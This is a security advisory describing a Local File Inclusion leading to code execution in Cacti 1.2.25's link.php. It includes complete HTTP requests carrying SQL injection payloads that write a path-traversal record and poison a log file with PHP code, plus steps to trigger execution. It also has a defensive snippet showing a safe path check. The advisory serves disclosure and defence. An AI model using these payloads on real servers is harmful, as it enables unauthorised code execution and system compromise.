Local File Inclusion (RCE)
Product: Cacti
Version: 1.2.25
Description: By combining the previously detected SQL Injection with insufficient processing of the include file path, it is possible to execute arbitrary code on the server. Exploitation of the vulnerability is possible for an authorized user. The vulnerable component is link.php. Impact of the vulnerability – execution of arbitrary code on the server.
Mitigation: Improve data escaping to prevent Local File Inclusion.
Research
The Local File Inclusion is located in the link.php file.
Line 27 queries information from the external_links table in the database. Line 56 performs the permission check, comparing the id record with the one from the database. On line 79 the path to the file is formed; it is checked for existence on line 81 and included on line 82.

Figure 1. Script link.php with the directory escape vulnerability, reached through the SQL Injection considered earlier
The rest of this report demonstrates how arbitrary code is executed on the server.
First, the previously found SQL Injection is used to write a record into the external_links table. The important part is writing the correct contentfile value.
Listing 1. Writing data via SQL Injection to the external_links table
POST /cacti/pollers.php?header=false HTTP/1.1
Host: ***.***.*.174:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 419
Origin: http://***.***.*.174:8080
Connection: close
Referer: http://***.***.*.174:8080/cacti/pollers.php?action=edit&id=1
Cookie: CactiDateTime=Sat Oct 28 2023 22:51:39 GMT+0300 (Москва, стандартное время); CactiTimeZone=180; Cacti=acbmsv2adk9forvpkqt0njd1oc; cacti_remembers=1%2C0%2C28a320bc68fa35780e2f050b1f2eb14c0f0adc1d11112f87cf2360dd1bbdc939; CactiDateTime=Fri Oct 27 2023 12:27:36 GMT+0300 (Москва, стандартное время); CactiTimeZone=180

__csrf_magic=sid%3A1f5ff4435f8a2bc44a869ed53a0024cbedd194d5%2C1698525354&name=Main+Poller&hostname=unknown&timezone=&notes=&processes=1&threads=1&id=2&save_component_poller=1&dbhost=";INSERT%20INTO%20external_links%20(id,sortorder,enabled,contentfile,title,style)%20values%20(10,2,"on","....//....//....//....//opt/cacti/log/cacti.log","Test","TAB");%20select%20*%20from%20poller%20where%201=1%20and%20"%"="&action=save
After sending the HTTP request with the SQL Injection, the required data appeared in the external_links table.

Figure 2. Recorded data in the external_links table via SQL Injection
The entry with id = 10 contains the value ....//....//....//....//opt/cacti/log/cacti.log in the contentfile field. This value was chosen for two reasons:
- With this value the sanitization can be bypassed, which leads to the construction of an arbitrary valid path to any file on the system

Figure 3. Attempt to prevent going outside the directory

Figure 4. Demonstration of circumvention of the mechanism to prevent going outside the directory
- The file /opt/cacti/log/cacti.log is writable by the www-data user. This allows poisoning the file with a payload, which appears in the log file /opt/cacti/log/cacti.log without sanitization. The log file is poisoned using the previously found Error-Based SQL Injection.
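As an added illustration (not the advisory's or Cacti's own code), the snippet below contrasts an assumed single-pass filter that strips ../ once, which the ....// value above turns back into ../ after filtering, with a check built on realpath that rejects any resolved path outside the include directory. The BASE_DIR value and the filter itself are assumptions for the example.

```python
import os
from typing import Optional

# Assumed base directory for included link content; constructed for this
# example, not Cacti's real layout.
BASE_DIR = "/opt/cacti/include/external"


def naive_sanitize(contentfile: str) -> str:
    """Weak filter (assumed, illustrative): removes '../' in a single pass."""
    return contentfile.replace("../", "")


def naive_include_path(contentfile: str) -> str:
    """Builds the include path after the weak filter and normalizes it.

    A value such as '....//....//opt/cacti/log/cacti.log' becomes
    '../../opt/cacti/log/cacti.log' after one pass, so the traversal survives.
    """
    return os.path.normpath(os.path.join(BASE_DIR, naive_sanitize(contentfile)))


def safe_include_path(contentfile: str) -> Optional[str]:
    """Resolves the candidate path and rejects anything that escapes BASE_DIR.

    realpath() collapses '..' and symlinks, so the decision is made on the
    final resolved path rather than on the user-supplied string.
    """
    base = os.path.realpath(BASE_DIR)
    candidate = os.path.realpath(os.path.join(base, contentfile))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    poisoned = "....//....//....//....//opt/cacti/log/cacti.log"
    print("weak filter   ->", naive_include_path(poisoned))
    print("realpath check->", safe_include_path(poisoned))
    print("realpath check->", safe_include_path("../../../../etc/passwd"))
    print("realpath check->", safe_include_path("links.html"))
```

With the realpath check the ....// value no longer escapes the base directory: it resolves to a path under BASE_DIR made of literal "...." components, which the following existence check then rejects.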
Listing 6. Poisoning the logging file /opt/cacti/log/cacti.log with data that will lead to remote code execution
POST /cacti/pollers.php?header=false HTTP/1.1
Host: ***.***.*.174:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 295
Origin: http://***.***.*.174:8080
Connection: close
Referer: http://***.***.*.174:8080/cacti/pollers.php?action=edit&id=1
Cookie: CactiDateTime=Sat Oct 28 2023 22:51:39 GMT+0300 (Москва, стандартное время); CactiTimeZone=180; Cacti=acbmsv2adk9forvpkqt0njd1oc; cacti_remembers=1%2C0%2C28a320bc68fa35780e2f050b1f2eb14c0f0adc1d11112f87cf2360dd1bbdc939; CactiDateTime=Fri Oct 27 2023 12:27:36 GMT+0300 (Москва, стандартное время); CactiTimeZone=180

__csrf_magic=sid%3A1f5ff4435f8a2bc44a869ed53a0024cbedd194d5%2C1698525354&name=Main+Poller&hostname=unknown&timezone=&notes=&processes=1&threads=1&id=2&save_component_poller=1&dbhost="%20and%20updatexml(rand(),concat(CHAR(126),'<?php+system(\'id\')+?>',CHAR(126)),null)%20and%20"%"="%&action=save

Figure 5. HTTP request and HTTP response poisoning of the logging file /opt/cacti/log/cacti.log
After executing the request, a payload injected via Error-Based SQL Injection with the value <?php system('id'); ?> appeared in the file /opt/cacti/log/cacti.log.

Figure 6. Demonstration of the logging file /opt/cacti/log/cacti.log poisoned using Error-Based SQL Injection
All that remains is to make sure that the is_realm_allowed function returns a positive result; execution then proceeds along the desired path. This is achieved by granting the permission to the user (Configuration -> Users -> User -> Permissions -> External Link Permissions).

Figure 7. Enabling external link resolution for the current user
The Test item (the record written to the database using SQL Injection) appeared in the menu. When it is clicked, the poisoned log file is included and the PHP code is executed on the server. In this case, the result of the system('id') command is visible.

Figure 8. Demonstration of remote code execution on the server when using the system('id') command
Researcher: Aleksey Solovev (Positive Technologies)